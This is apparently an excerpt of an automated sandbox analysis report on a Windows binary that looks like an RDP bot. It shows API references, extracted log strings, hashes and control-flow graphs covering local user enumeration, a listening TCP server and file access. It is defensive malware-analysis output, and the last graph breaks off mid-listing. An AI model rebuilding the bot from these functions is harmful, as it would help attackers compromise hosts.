    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
    • API String ID: 3624467404-104752423
    • Opcode ID: 2e2958dbf98501d3ab173c986b780afff19839acce68fadd3af11913b5c6b7ac
    • Instruction ID: 75dd09ee62b2cdabd207f0f8050122cca3cc3e9a40b897487fe60133689a2dbc
    • Opcode Fuzzy Hash: 2e2958dbf98501d3ab173c986b780afff19839acce68fadd3af11913b5c6b7ac
    • Instruction Fuzzy Hash: 2CF16CA2A0CA4286FB60CB64E4843BE73A1EB85754F154037D9CE477B9DE7CE845C741
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
    • API String ID: 4253334766-1535167640
    • Opcode ID: 4f4abd2465558705778aac330484c96298e1df306dc296a4cdd9c6c65dcce59e
    • Instruction ID: 6e808943c6d596cfbe12a729d3883151d926e660caee59667bc2dc2be5a77739
    • Opcode Fuzzy Hash: 4f4abd2465558705778aac330484c96298e1df306dc296a4cdd9c6c65dcce59e
    • Instruction Fuzzy Hash: F66149B2E0EB5386FB30AF55A8047B96250EF01365F840132E9DE5B2F5DE6CED858B41
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
    • API String ID: 1094913617-1535167640
    • Opcode ID: d1eaded348a0ad7f8d20c16922a4bb7f63fc925ea0b3ab5fe7d8790345d26317
    • Instruction ID: 1e808d096d00cc3a2354a36607fe14c722850cb4da6b03eeaebeda0e447a7186
    • Opcode Fuzzy Hash: d1eaded348a0ad7f8d20c16922a4bb7f63fc925ea0b3ab5fe7d8790345d26317
    • Instruction Fuzzy Hash: A0619127E1C55387FB604B44A4613B8236C6F00794F558972E89EEB2D7DE2EA844F34B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
    • API String ID: 1987963910-3382179125
    • Opcode ID: 92aed0625b4e96070c7cd11b3d45800132d8ad76df3ecdda4df41ef72c2df09a
    • Instruction ID: 20860cc711349536eedfa3a103b009b6fc09f0aee134d13689966414c32ec8f2
    • Opcode Fuzzy Hash: 92aed0625b4e96070c7cd11b3d45800132d8ad76df3ecdda4df41ef72c2df09a
    • Instruction Fuzzy Hash: 31615DA2A0C74786FA609B64E84037AB691AF85794F240037DDDD477F1EE7DE895C301
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
    • API String ID: 3590747132-3524496754
    • Opcode ID: f81741f31f12baaca90571594b9371d39ed765417e1fc145e8fe1e463189f439
    • Instruction ID: 8c150e0a2fc5a11411f97b4f7bb540b6da7836c8908289ca56d3b6bfa8049ec1
    • Opcode Fuzzy Hash: f81741f31f12baaca90571594b9371d39ed765417e1fc145e8fe1e463189f439
    • Instruction Fuzzy Hash: ED31C321A0CE068DEA109B27E8002796291AF647B5F0403F5E97EA3BF4EE3CE441C708
    APIs
    • strcmp.MSVCRT ref: 00007FF6EF651DD4
    • strcmp.MSVCRT ref: 00007FF6EF651DE7
    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6EF651E23
    • _read.MSVCRT ref: 00007FF6EF651E79
    • GetLastError.KERNEL32 ref: 00007FF6EF651E98
      • Part of subcall function 00007FF6EF651A63: FreeLibrary.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AA1
      • Part of subcall function 00007FF6EF651A63: GetProcessHeap.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AD4
      • Part of subcall function 00007FF6EF651A63: HeapFree.KERNEL32(?,?,00000000,000001FC7A4F13D0,00007FF6EF651E50,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508), ref: 00007FF6EF651AE5
      • Part of subcall function 00007FF6EF651B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6EF651E55,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508,00000000), ref: 00007FF6EF651B4D
      • Part of subcall function 00007FF6EF651B1C: HeapFree.KERNEL32(?,?,00000000,00007FF6EF651E55,?,?,?,?,?,?,00000001,00007FF6EF651FC3,?,?,00007FF6EF668508,00000000), ref: 00007FF6EF651B5E
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
    • API String ID: 3617873859-308889057
    • Opcode ID: 1fc342a3e2137554fd4581aff8ff3e54cdb34c78680a949aad63a6d78d1a5a0b
    • Instruction ID: e379429c7db98664998d551dc9da77ba767bf14d1c120f509e9ff52bd7ba3367
    • Opcode Fuzzy Hash: 1fc342a3e2137554fd4581aff8ff3e54cdb34c78680a949aad63a6d78d1a5a0b
    • Instruction Fuzzy Hash: FA510726E1C64397FB605710A49037823AEAF58348F540D32E94EE6293DF5FE985B20F
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
    • String ID:
    • API String ID: 3714283218-0
    • Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
    • Instruction ID: 47676ecc53c82038398837b09593916365f33bfaf7792173e8ba3742c2c3eac9
    • Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
    • Instruction Fuzzy Hash: 78514A23E18A4787FB50DF21E85037923A9AF44B84F058935E90DD7396DE3EE440A34A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: 38f8d3981f46cf077d29cf7f9c2752560a238c82d17b9e1c80a92427f143cbc7
    • Instruction ID: 08a7365b9e4e1f5f71e145e378fd3a2bdb3c443956582e5495b9cca081fc6a61
    • Opcode Fuzzy Hash: 38f8d3981f46cf077d29cf7f9c2752560a238c82d17b9e1c80a92427f143cbc7
    • Instruction Fuzzy Hash: 761130E8F0C61792F6105739A8402F83255AF46BF8F501337E9FD9A6F5DE6CA9568300

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 7ff6ef654fc5-7ff6ef654fe1 1 7ff6ef655077-7ff6ef6550a5 call 7ff6ef652ef2 0->1 2 7ff6ef654fe7-7ff6ef654fea 0->2 13 7ff6ef655529-7ff6ef65553a 1->13 4 7ff6ef6550aa-7ff6ef6550d8 call 7ff6ef652ef2 2->4 5 7ff6ef654ff0-7ff6ef654ff4 2->5 4->13 8 7ff6ef654ff6-7ff6ef654ffa 5->8 9 7ff6ef655000-7ff6ef655015 fopen 5->9 8->9 10 7ff6ef6550dd-7ff6ef65510b call 7ff6ef652ef2 8->10 11 7ff6ef65501b-7ff6ef655030 fseek 9->11 12 7ff6ef655110-7ff6ef655139 _errno call 7ff6ef652ef2 _errno 9->12 10->13 16 7ff6ef655036-7ff6ef65505f _errno call 7ff6ef652ef2 _errno 11->16 17 7ff6ef6551e3-7ff6ef6551f0 call 7ff6ef65e438 11->17 27 7ff6ef65513b-7ff6ef655148 12->27 28 7ff6ef65517f-7ff6ef655193 _errno 12->28 18 7ff6ef65553c 13->18 19 7ff6ef655543-7ff6ef655550 13->19 33 7ff6ef6551ca-7ff6ef6551de _errno 16->33 34 7ff6ef655065-7ff6ef655072 16->34 36 7ff6ef65521b-7ff6ef655244 _errno call 7ff6ef652ef2 _errno 17->36 37 7ff6ef6551f2 17->37 18->19 24 7ff6ef655589-7ff6ef655590 19->24 25 7ff6ef655552-7ff6ef655563 call 7ff6ef652ef2 19->25 24->25 32 7ff6ef655568-7ff6ef65557a 25->32 27->28 35 7ff6ef655518-7ff6ef65551b 28->35 33->35 34->1 38 7ff6ef65551d-7ff6ef655520 fclose 35->38 39 7ff6ef655525-7ff6ef655527 35->39 47 7ff6ef65528a-7ff6ef65529e _errno 36->47 48 7ff6ef655246-7ff6ef655253 36->48 40 7ff6ef6551f8-7ff6ef6551fd 37->40 41 7ff6ef655513 37->41 38->39 39->13 44 7ff6ef655592-7ff6ef6555ab call 7ff6ef652ef2 39->44 45 7ff6ef6552a3-7ff6ef6552bb fseek 40->45 46 7ff6ef655203-7ff6ef655208 40->46 41->35 44->32 50 7ff6ef6552bd-7ff6ef6552c9 45->50 51 7ff6ef655331-7ff6ef65535a _errno call 7ff6ef652ef2 _errno 45->51 46->45 52 7ff6ef65520e-7ff6ef655216 46->52 47->35 48->47 54 7ff6ef6553b9-7ff6ef6553db GetProcessHeap HeapAlloc 50->54 55 7ff6ef6552cf-7ff6ef6552d5 50->55 61 7ff6ef65535c-7ff6ef655369 51->61 62 7ff6ef6553a0-7ff6ef6553b4 _errno 51->62 52->35 54->55 57 7ff6ef6553e1-7ff6ef6553f7 call 7ff6ef652ef2 54->57 58 7ff6ef6552db 55->58 59 7ff6ef655582-7ff6ef655587 55->59 57->55 64 7ff6ef6552e0-7ff6ef6552ef 58->64 59->35 61->62 62->35 66 7ff6ef6552f5-7ff6ef6552f7 64->66 67 7ff6ef65548e-7ff6ef655497 64->67 66->67 68 7ff6ef6552fd-7ff6ef655320 fread 66->68 69 7ff6ef655499-7ff6ef65549b 67->69 70 7ff6ef6554bf-7ff6ef6554e2 call 7ff6ef652ef2 67->70 68->67 72 7ff6ef655326 68->72 73 7ff6ef65549d-7ff6ef6554a2 69->73 74 7ff6ef6554e4-7ff6ef6554e9 69->74 70->73 79 7ff6ef6553fc-7ff6ef655425 _errno call 7ff6ef652ef2 _errno 72->79 80 7ff6ef65532c-7ff6ef65532f 72->80 73->35 75 7ff6ef6554a4-7ff6ef6554bd GetProcessHeap HeapFree 73->75 77 7ff6ef6554eb-7ff6ef6554f1 74->77 78 7ff6ef6554f3-7ff6ef6554fc 74->78 75->35 77->35 78->77 83 7ff6ef65546b-7ff6ef65547f _errno 79->83 84 7ff6ef655427-7ff6ef655434 79->84 80->64 83->64 84->83
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: _errno$fclosefflushfopenfseekfwrite
    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
    • API String ID: 2897271634-4120527733
    • Opcode ID: 4115192af16a4c9e579fc7fcde00cfa20cb0733149147f2840e506c55bace900
    • Instruction ID: 43d5405becffd908476dded0d9503f03d0947980ba7189639ccd7643de681d23
    • Opcode Fuzzy Hash: 4115192af16a4c9e579fc7fcde00cfa20cb0733149147f2840e506c55bace900
    • Instruction Fuzzy Hash: E5D1B623A1860383FB109F54E8443782769BF55B98F454832E50DE72A2EF3EE945F34A

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 85 7ffe13383aa7-7ffe13383aca InitializeCriticalSectionAndSpinCount 86 7ffe13383c52-7ffe13383c73 GetLastError call 7ffe13382072 85->86 87 7ffe13383ad0-7ffe13383af7 InitializeCriticalSectionAndSpinCount 85->87 97 7ffe13383c75 86->97 98 7ffe13383c8d-7ffe13383c93 86->98 89 7ffe13383d6e-7ffe13383d8f GetLastError call 7ffe13382072 87->89 90 7ffe13383afd-7ffe13383b0d 87->90 107 7ffe13383d91 89->107 108 7ffe13383da9-7ffe13383daf 89->108 91 7ffe13383b13-7ffe13383b4b CreateThread 90->91 92 7ffe13384140-7ffe13384158 call 7ffe13382072 90->92 95 7ffe13383b51-7ffe13383b6d call 7ffe13382072 91->95 96 7ffe13383e46-7ffe13383e67 GetLastError call 7ffe13382072 91->96 106 7ffe1338415d-7ffe13384164 92->106 95->92 118 7ffe13383b73-7ffe13383bab CreateThread 95->118 122 7ffe13383e7d-7ffe13383e83 96->122 123 7ffe13383e69 96->123 102 7ffe13383d1e 97->102 103 7ffe13383c7b-7ffe13383c88 97->103 104 7ffe13383d32 98->104 105 7ffe13383c99-7ffe13383c9f 98->105 102->104 103->98 121 7ffe13383d3c 104->121 111 7ffe13383ca1-7ffe13383ca7 105->111 112 7ffe13383ccb-7ffe13383cce 105->112 113 7ffe1338413b 107->113 114 7ffe13383d97-7ffe13383da4 107->114 116 7ffe13384165-7ffe1338416a 108->116 117 7ffe13383db5-7ffe13383dbb 108->117 119 7ffe13383cad-7ffe13383cb3 111->119 120 7ffe13383d5a 111->120 126 7ffe13383ce4-7ffe13383cea 112->126 127 7ffe13383cd0-7ffe13383cd3 112->127 113->92 114->108 116->92 124 7ffe13383dbd-7ffe13383dc3 117->124 125 7ffe13383de7-7ffe13383dea 117->125 132 7ffe13383bb1-7ffe13383bcd call 7ffe13382072 118->132 133 7ffe13383f4e-7ffe13383f6f GetLastError call 7ffe13382072 118->133 134 7ffe13383d64 119->134 135 7ffe13383cb9-7ffe13383cbf 119->135 120->134 149 7ffe13383d46 121->149 140 7ffe13383e85 122->140 141 7ffe13383ee0-7ffe13383ef0 122->141 136 7ffe13383e9f-7ffe13383eaf 123->136 137 7ffe13383e6b-7ffe13383e78 123->137 138 7ffe13384181-7ffe13384186 124->138 139 7ffe13383dc9-7ffe13383dcf 124->139 128 7ffe13383dec-7ffe13383def 125->128 129 7ffe13383e08-7ffe13383e0e 125->129 130 7ffe13383d50 126->130 131 7ffe13383cec 126->131 127->121 142 7ffe13383cd5-7ffe13383cd8 127->142 150 7ffe13383df5-7ffe13383df8 128->150 151 7ffe1338416c-7ffe13384171 128->151 152 7ffe13383e14-7ffe13383e19 129->152 153 7ffe1338417a-7ffe1338417f 129->153 130->120 144 7ffe13383cf6 131->144 132->92 173 7ffe13383bd3-7ffe13383c0b CreateThread 132->173 171 7ffe13383f85-7ffe13383f8b 133->171 172 7ffe13383f71 133->172 134->89 143 7ffe13383cc1 135->143 135->144 136->92 137->122 138->92 146 7ffe13383dd5-7ffe13383ddb 139->146 147 7ffe13384188-7ffe1338418d 139->147 155 7ffe13383eb4-7ffe13383eb7 140->155 156 7ffe13383e87-7ffe13383e8d 140->156 141->92 148 7ffe13383cda 142->148 142->149 143->112 144->102 162 7ffe13383e1e-7ffe13383e23 146->162 163 7ffe13383ddd-7ffe13383de2 146->163 147->92 148->126 149->130 164 7ffe13384173-7ffe13384178 150->164 165 7ffe13383dfe-7ffe13383e03 150->165 151->92 152->92 153->92 159 7ffe13383eb9-7ffe13383ebc 155->159 160 7ffe13383ed8-7ffe13383ede 155->160 157 7ffe13383ec3-7ffe13383ed3 156->157 158 7ffe13383e8f-7ffe13383e95 156->158 157->92 167 7ffe13383ef5-7ffe13383f05 158->167 168 7ffe13383e97-7ffe13383e9d 158->168 169 7ffe13383ebe-7ffe13383ec1 159->169 170 7ffe13383f0a-7ffe13383f1a 159->170 160->136 160->141 162->92 163->92 164->92 165->92 167->92 168->136 168->141 169->136 169->157 170->92 176 7ffe13383f8d 171->176 177 7ffe13383fe8-7ffe13383ff8 171->177 174 7ffe13383f73-7ffe13383f80 172->174 175 7ffe13383fa7-7ffe13383fb7 172->175 178 7ffe13383c11-7ffe13383c2d call 7ffe13382072 173->178 179 7ffe1338404c-7ffe1338406d GetLastError call 7ffe13382072 173->179 174->171 175->92 181 7ffe13383f8f-7ffe13383f95 176->181 182 7ffe13383fbc-7ffe13383fbf 176->182 177->92 178->92 196 7ffe13383c33-7ffe13383c48 call 7ffe13382072 178->196 190 7ffe13384083-7ffe13384089 179->190 191 7ffe1338406f 179->191 185 7ffe13383fcb-7ffe13383fdb 181->185 186 7ffe13383f97-7ffe13383f9d 181->186 187 7ffe13383fc1-7ffe13383fc4 182->187 188 7ffe13383fe0-7ffe13383fe6 182->188 185->92 192 7ffe13383f9f-7ffe13383fa5 186->192 193 7ffe13383ffd-7ffe1338400d 186->193 194 7ffe13384012-7ffe13384022 187->194 195 7ffe13383fc6-7ffe13383fc9 187->195 188->175 188->177 199 7ffe1338408b 190->199 200 7ffe133840b9-7ffe133840c9 190->200 197 7ffe133840e3-7ffe133840f3 191->197 198 7ffe13384071-7ffe1338407e 191->198 192->175 192->177 193->92 194->92 195->175 195->185 204 7ffe13383c4d 196->204 197->92 198->190 202 7ffe1338408d-7ffe13384090 199->202 203 7ffe133840cb-7ffe133840d1 199->203 200->92 205 7ffe13384092-7ffe13384095 202->205 206 7ffe133840b1-7ffe133840b7 202->206 207 7ffe133840d3-7ffe133840d9 203->207 208 7ffe1338409c-7ffe133840ac 203->208 204->106 209 7ffe13384107-7ffe13384117 205->209 210 7ffe13384097-7ffe1338409a 205->210 206->197 206->200 211 7ffe133840f5-7ffe13384105 207->211 212 7ffe133840db-7ffe133840e1 207->212 208->92 209->92 210->197 210->208 211->92 212->197 212->200
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
    • API String ID: 3214881788-719614687
    • Opcode ID: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
    • Instruction ID: 4b751e38589d93fb4f259a4f10ba8aa5c5ca637d1517c141149c2d31a7f5a150
    • Opcode Fuzzy Hash: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
    • Instruction Fuzzy Hash: 55F1E364E0CF0389FA605717A88037D2252AF34775F6003F6C57E66AF1DE6EAAC58349

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 213 7ffe1338482c-7ffe13384846 call 7ffe13385154 216 7ffe1338484c-7ffe13384861 call 7ffe133850d3 213->216 217 7ffe13384d68 213->217 222 7ffe13384863-7ffe13384891 216->222 223 7ffe133848b7 216->223 219 7ffe13384d7c-7ffe13384d81 217->219 221 7ffe133848c9-7ffe133848e0 call 7ffe13382072 219->221 228 7ffe133848e5-7ffe133848f2 221->228 229 7ffe13384893-7ffe13384898 222->229 230 7ffe1338489a-7ffe133848b5 call 7ffe13382072 222->230 224 7ffe133848bc-7ffe133848c7 FreeLibrary 223->224 224->221 227 7ffe133848f3-7ffe1338492c GetNativeSystemInfo GetWindowsDirectoryA 224->227 231 7ffe13384932-7ffe13384953 GetLastError call 7ffe13382072 227->231 232 7ffe13384a10-7ffe13384a33 call 7ffe13382072 227->232 229->224 230->224 240 7ffe13384955 231->240 241 7ffe13384973-7ffe13384979 231->241 232->221 239 7ffe13384a39-7ffe13384a6f call 7ffe13389ad2 232->239 249 7ffe13384a75-7ffe13384a77 239->249 250 7ffe13384b20-7ffe13384b3c call 7ffe13382072 239->250 242 7ffe13384969-7ffe1338496e 240->242 243 7ffe13384957-7ffe13384964 240->243 241->219 245 7ffe1338497f-7ffe13384985 241->245 242->221 243->242 247 7ffe133849be-7ffe133849c4 245->247 248 7ffe13384987-7ffe1338498a 245->248 253 7ffe13384da4-7ffe13384da9 247->253 254 